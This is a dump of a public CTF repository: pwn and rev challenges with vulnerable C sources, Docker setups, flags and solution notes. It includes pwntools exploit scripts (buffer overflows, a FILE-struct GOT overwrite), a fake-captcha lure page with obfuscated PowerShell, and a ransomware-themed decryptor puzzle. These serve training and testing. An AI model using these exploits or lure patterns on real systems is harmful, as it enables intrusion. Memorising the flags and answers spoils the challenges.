6 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN dpkg --add-architecture i386 10 | RUN apt-get update && apt-get install -y socat libc6:i386 libstdc++6:i386 11 | 12 | RUN addgroup --gid 1001 nonroot && \ 13 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 14 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 15 | USER 1001 16 | 17 | WORKDIR /srv/app 18 | 19 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/password/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -m32 -no-pie -o chal 2 | 3 | #include 4 | #include 5 | 6 | void win(){ 7 | system("cat flag.txt"); 8 | } 9 | 10 | void isEven(){ 11 | int num; 12 | printf("Enter your number: "); 13 | scanf("%d", num); 14 | 15 | if(num % 2 == 0){ 16 | puts("The number is even!"); 17 | }else{ 18 | puts("The number is odd!"); 19 | } 20 | } 21 | void getFeedback(){ 22 | char feedback[100]; 23 | printf("We know our service is amazing, so you can give feedback before using it!\nFeedback: "); 24 | scanf("%100s", feedback); 25 | } 26 | 27 | int main(){ 28 | setvbuf(stdin, NULL, _IONBF, 0); 29 | setvbuf(stdout, NULL, _IONBF, 0); 30 | printf("IsEven Service\n"); 31 | getFeedback(); 32 | isEven(); 33 | return 0; 34 | } -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | password: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/password/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{g0T_Ov3rRide} -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 100 2 | author: fern 3 | category: pwn 4 | description: Welcome to the first pwn challenge! Can you exploit this program to get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{Sm4sH_tH3_sT4cK} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn100/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste the text `AAAAAAAAAAAAAAAAAAAAAAAABiBiBiBi`. -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN apt-get update && apt-get install -y socat 8 | 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn100/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pwn100: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn100/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 101 2 | author: fern 3 | category: pwn 4 | description: You beat pwn 100, here's a harder level for you! Can you exploit the program to get the flag? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{0V3rRid1Ng_r3TuRn_4dDr3Ss} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = ELF("chal") 3 | p = remote("localhost", 8000) #process("./chal") 4 | p.clean() 5 | p.sendline(b"0") 6 | p.clean() 7 | p.sendline(b"A"*40 + p64(elf.sym["win"])) 8 | p.clean() 9 | p.sendline(b"1") 10 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | RUN chmod 555 /srv/app/run 6 | RUN chmod 555 /srv/app/entry.sh 7 | RUN apt-get update && apt-get install -y socat 8 | 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn101/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pwn101: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn101/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Pwn 201 2 | author: fern 3 | category: pwn 4 | description: Are you ready for the second level of pwn? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{F1l3_sTruCt_H1j4CkiNg} 13 | 14 | files: 15 | - dist/chal.c 16 | - dist/chal 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/dist/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/dist/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/dist/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -fstack-protector -no-pie -o chal 2 | #include 3 | #include 4 | #include 5 | void win(){ 6 | system("cat flag.txt"); 7 | } 8 | int main(){ 9 | setvbuf(stdout, NULL, _IONBF, 0); 10 | setvbuf(stdin, NULL, _IONBF, 0); 11 | setvbuf(stderr, NULL, _IONBF, 0); 12 | char leet[10] = {0}; 13 | puts("What is your name?"); 14 | read(0, stdin, 480); 15 | puts("Are you 1337?"); 16 | fgets(leet, 9, stdin); 17 | puts("You are not 1337."); 18 | } -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solve/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/solve/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/solve/soln.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | elf = context.binary = ELF("chal") 3 | p = remote("127.0.0.1", 8000) #process() 4 | cls = lambda: print(p.clean(timeout=0.2).decode()) 5 | 6 | cls() 7 | fs = FileStructure() 8 | pay = fs.read(elf.got["puts"], 10) 9 | p.send(pay) 10 | cls() 11 | p.sendline(p64(elf.sym["win"])) 12 | p.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:12 2 | 3 | COPY ./chal /srv/app/run 4 | COPY ./entry.sh /srv/app/entry.sh 5 | COPY ./flag.txt /srv/app/flag.txt 6 | RUN chmod 555 /srv/app/run 7 | RUN chmod 444 /srv/app/flag.txt 8 | RUN chmod 555 /srv/app/entry.sh 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/pwn201/src/chal -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/chal.c: -------------------------------------------------------------------------------- 1 | //gcc chal.c -fstack-protector -no-pie -o chal 2 | #include 3 | #include 4 | #include 5 | void win(){ 6 | system("cat flag.txt"); 7 | } 8 | int main(){ 9 | setvbuf(stdout, NULL, _IONBF, 0); 10 | setvbuf(stdin, NULL, _IONBF, 0); 11 | setvbuf(stderr, NULL, _IONBF, 0); 12 | char leet[10] = {0}; 13 | puts("What is your name?"); 14 | read(0, stdin, 480); 15 | puts("Are you 1337?"); 16 | fgets(leet, 9, stdin); 17 | puts("You are not 1337."); 18 | } -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | pwn201: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m /srv/app/run" -------------------------------------------------------------------------------- /Challenges/Pwn/pwn201/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{F1l3_sTruCt_H1j4CkiNg} -------------------------------------------------------------------------------- /Challenges/Pwn/speed/challenge.yml: -------------------------------------------------------------------------------- 1 | name: I am speed 2 | author: fern 3 | category: pwn 4 | description: 30 programs. 60 seconds. Can you hack them all? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{I_4M_s0_Sp33d} 13 | 14 | files: 15 | 16 | connection_info: nc hostname 8000 17 | 18 | state: visible 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Pwn/speed/soln/auto.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import base64, os, time 3 | os.chdir("/tmp") 4 | c = remote("localhost", 8000) 5 | print(c.recvline().strip()) 6 | c.sendline(b"y") 7 | for i in range(30): 8 | decoded_data = base64.b64decode(c.recvline().strip()) 9 | print(c.recvline().strip()) 10 | with open("prog", "wb") as file: 11 | file.write(decoded_data) 12 | os.system("chmod +x prog") 13 | context.binary = elf = ELF("prog") 14 | p = process() 15 | p.sendline(cyclic(1000)) 16 | p.wait() 17 | core = p.corefile 18 | stack = core.rsp 19 | pattern = core.read(stack, 4) 20 | rip_offset = cyclic_find(pattern) 21 | print("rip is %d" % rip_offset) 22 | win = elf.sym["win"] 23 | c.sendline(b"A" * rip_offset + p64(win)) 24 | print(c.recvline().strip()) 25 | c.interactive() -------------------------------------------------------------------------------- /Challenges/Pwn/speed/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solution in `soln/`. -------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.11-slim-bookworm 3 | 4 | # copy the requirements file into the image 5 | COPY ./requirements.txt /app/requirements.txt 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | RUN apt update 11 | RUN apt install gcc -y 12 | 13 | # install the dependencies and packages in the requirements file 14 | RUN pip install -r requirements.txt 15 | 16 | # copy every content from the local file to the image 17 | COPY . /app 18 | 19 | RUN addgroup --gid 1001 nonroot && \ 20 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 21 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 22 | USER 1001 23 | 24 | # configure the container to run in an executed manner 25 | ENTRYPOINT [ "python" ] 26 | 27 | CMD ["app.py" ] 28 | -------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | speed: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/speed/src/requirements.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/speed/src/requirements.txt -------------------------------------------------------------------------------- /Challenges/README.md: -------------------------------------------------------------------------------- 1 | ## How to add your challenges 2 | 3 | Create a folder with the name of your challenge (be creative) 4 | 5 | Folder structure example: 6 | ``` 7 | challengename 8 | - src 9 | - - server.py 10 | - - Dockerfile 11 | - dist 12 | - - server.py 13 | - - Dockerfile 14 | - solution.md 15 | - challenge.yml 16 | ``` 17 | 18 | The `src` folder contains everything that goes into the creation of challenges like Dockerfile, server file, Makefile, etc ... 19 | 20 | The `dist` folder contains everything that is given to the players as source code (rmb to remove flags) 21 | 22 | The `solution.md` contains method to solve (pls be elaborate) 23 | 24 | The `challenge.yml` contains the Author name, Challenge name, Description, Hint (if any), Category, Difficulty, Points. 25 | It follows the CTFd format found [here](https://github.com/CTFd/ctfcli/blob/master/ctfcli/spec/challenge-example.yml) 26 | -------------------------------------------------------------------------------- /Challenges/Rev/README.md: -------------------------------------------------------------------------------- 1 | Rev Challenges -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Are You A Robot? 2 | author: scuffed 3 | category: rev 4 | description: "ARE YOU STRUGGLING TO LEVEL UP IN CLASHER KINGS? GET YOUR FREE CRYSTALS AND MANA HERE! TOTALLY LEGIT AND 100% SAFE, YOU JUST NEED TO VERIFY YOU'RE A HUMAN AND IT'S ALL YOURS!\n\nDisclaimer: This challenge may trip Windows Defender or any other antivirus solution you have installed. **The code in this challenge is perfectly safe and will not cause any impact to your computer.** It's advised to simply make an exception for this challenge rather than switching off your antivirus. Also, this website does not actually generate any mana or crystals. Sorry. " 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{free_powershell_glitch} 13 | 14 | state: visible 15 | version: "0.1" 16 | -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/solution.md: -------------------------------------------------------------------------------- 1 | Decode the powershell that gets pasted into the clipboard, just From Base64 followed by a Raw Inflate in CyberChef. 2 | 3 | flag: `blahaj{free_powershell_glitch}` -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM lipanski/docker-static-website:latest 2 | 3 | # Copy your static files 4 | COPY . . 5 | 6 | CMD ["/busybox-httpd", "-f", "-v", "-p", "8000"] -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/bg.png -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/captcha.ps1: -------------------------------------------------------------------------------- 1 | . ((vAriable '*mDr*').nAMe[3,11,2]-joIN'') ( NEw-obJeCT iO.STREamREAdEr(( NEw-obJeCT IO.ComPrEsSion.deFlatestREaM( [iO.meMorYstreAM] [sYstem.CoNvERT]::FrOMbAse64STring('ZY9Ra8JAEIT/yiLCWTD3Awx9KDTQUIzFIj7qNa53Z47d9G7PNIj/vfG1fRmG4RuYqenKHRbVTx8xJc8EM3+GxXGOdF3tPqtt87KuoMBvUB0n58WQeoIb7KMXLDZZ+iygvoJx5nI7R8RDzwPG5DCEgw1eWndXcAcMCf/V9pHJgphoUZbgLXH0ZPXEl3/Ij8c6MDRChyMIQ8sknjJqrVUJxznlEOB5Mm+cRO9qvTXDQ9Gc3nFcqIar1vGypjbkE07RKw/Tk9kv' ), [systEM.io.cOMPrEsSiOn.compReSSIonmoDE]::DECOMpReSs) ), [SyStEm.teXT.EncOdIng]::aSciI) ).ReaDtoenD( ) -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | areyouarobot: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/favicon.ico -------------------------------------------------------------------------------- /Challenges/Rev/areyouarobot/src/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/areyouarobot/src/logo.png -------------------------------------------------------------------------------- /Challenges/Rev/assembly/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "assembly" 2 | author: "scuffed" 3 | category: rev 4 | description: Greetings reverse engineer! Here I've got a simple scrap of assembly source code written in MIPS. All I need of you is to determine the correct value of `flag` so that the `main` function returns `0` and not `-1` (in other words, the final value of the `a0` register is `0`)! Once solved, submit your flag as `blahaj{flag}` where `flag` is typed out in hex (e.g. `0xdeadbeef`). 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{0x5caff01d} 13 | 14 | files: 15 | - dist/challenge.s 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/assembly/solution.md: -------------------------------------------------------------------------------- 1 | whack MIPS, literally just a byte comparison. 2 | 3 | Flag: `blahaj{0x5caff01d}` -------------------------------------------------------------------------------- /Challenges/Rev/badbreaking/dist/breaking: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/badbreaking/dist/breaking -------------------------------------------------------------------------------- /Challenges/Rev/badbreaking/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | 1. Open in gdb 3 | 2. Use hardware breakpoints to extract 2 keys 4 | First key: 13688800432818270003 5 | Second key: 8513551167716696826 6 | 3. Get flag 7 | 8 | Trap: 9 | If you use software breakpoints, the first key is corrupted. You do not get the flag. 10 | 11 | Flag: `blahaj{bR3Ak1nG_H4RdlY_}` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/sol.md: -------------------------------------------------------------------------------- 1 | key is generated by applying RC4 onto the system name (NOKOTAN) with the current timestamp (you can fuzz a range from the date modified value of flag.SMILE) 2 | figure out that you can pull a copy of the decryptor by looking at the transaction history of the blahajcoin and plucking any address that has transferred to the ransomware address 3 | figure out where to place the key in the binary (you can compare diffs) and patch a copy 4 | run the patched decryptor 5 | 6 | machine name: NOKOTAN, timestamp: 1726291110, key: 48-BB-C7-82-72-91-93-F2-D4-15-EB-EF-F1-B1-F4-1E 7 | 8 | flag: `blahaj{I_WANNA_CRY_SO_BAD}` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/3Ff3i1QcR3WacYRgj2hmmqkdUykWRqFCKxY3QtDL8ET7.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/5nhEj7fnwcBvrMbm8RdeJoiWo28isUqL7BhS4bRneB1m.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/7cgjCgUBZzcggXtLpwxY7ek2PD9dy8Y3ymEuFobwyTsh.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/B7HBaDA3US8dDNZ34icgNWnpBYZJvciqJp1hy8f9G6zF.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.12-slim 3 | 4 | RUN apt update 5 | 6 | # switch working directory 7 | WORKDIR /app 8 | 9 | # copy every content from the local file to the image 10 | COPY . /app 11 | 12 | ENTRYPOINT ["sh"] 13 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/G8KZoPuDgADZSyzNZn9TfUJqHM3xokdQ5ZN6yd3chJ9T.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/README.md: -------------------------------------------------------------------------------- 1 | This docker container is to be pointed to by the domain `http://cbajiksuioweqhjlsakfgoi.blahaj.sg` -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | decryptorfiles: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/eLo8wXAbf8LJZxSTy8tTonPQx76L6edq1xj4KrgPGYj.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python3 /app/main.py -------------------------------------------------------------------------------- /Challenges/Rev/blahajcryptor/src/nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajcryptor/src/nG9EwmiYqaCEbntFkrMLgUpYCzND2tVDGzPR5XRfJbs.exe -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "blahajOS!" 2 | author: "scuffed" 3 | category: rev 4 | description: I managed to rip this OS image off a retro computer, but I can't gain access. Help me out! (to run the OS, run `qemu-system-x86_64 -drive format=raw,file=os.img`. To help you with the hacking of the program, the source code in assembly for the first sector of the OS has been provided.) 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{B105_INTs} 13 | 14 | files: 15 | - dist/boot.asm 16 | - dist/os.img 17 | 18 | state: visible 19 | 20 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/dist/os.img: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/blahajos/dist/os.img -------------------------------------------------------------------------------- /Challenges/Rev/blahajos/solution.md: -------------------------------------------------------------------------------- 1 | Recognise that the password is being checked backwards due to `std` instruction call. Patch out the wait by zeroing out `0x0f73` and `0x1400` from the binary so that the sleep becomes 0 seconds rather than 3 days. 2 | 3 | Flag: `blahaj{B105_INTs}` -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Club Classics 2 | author: scuffed 3 | category: rev 4 | description: "DJ, fix this mix!!!" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{BlaH4j_15_BRAT} 13 | 14 | state: visible 15 | version: "0.1" 16 | -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/solution.md: -------------------------------------------------------------------------------- 1 | Deobfuscate the JS in the HTML with some online tool, identify how to interact with the WASM. Reverse a few bit manipulation operations to get the flag. 2 | 3 | flag: `blahaj{BlaH4j_15_BRAT}` -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM lipanski/docker-static-website:latest 2 | 3 | # Copy your static files 4 | COPY . . 5 | 6 | CMD ["/busybox-httpd", "-f", "-v", "-p", "8000"] -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | clubclassics: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Rev/clubclassics/src/module.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/clubclassics/src/module.wasm -------------------------------------------------------------------------------- /Challenges/Rev/covfefe/challenge.yml: -------------------------------------------------------------------------------- 1 | name: covfefe 2 | author: scuffed 3 | category: rev 4 | description: Covfefe (/koʊˈfɛfi/ koh-FEF-ee, /kəvˈfeɪfeɪ, koʊˈfɛfeɪ/) is a word. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | files: 12 | - dist/Covfefe.jar 13 | 14 | flags: 15 | - blahaj{BaSESixTy4riNGy0u} 16 | 17 | state: visible 18 | version: "0.1" 19 | -------------------------------------------------------------------------------- /Challenges/Rev/covfefe/dist/Covfefe.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Rev/covfefe/dist/Covfefe.jar -------------------------------------------------------------------------------- /Challenges/Rev/crackme2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "crackme2" 2 | author: "scuffed" 3 | category: rev 4 | description: You can crack this file too, right? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{r3v_15nt_7h47_h4rd!} 13 | 14 | # Link all files in dist 15 | files: 16 | - 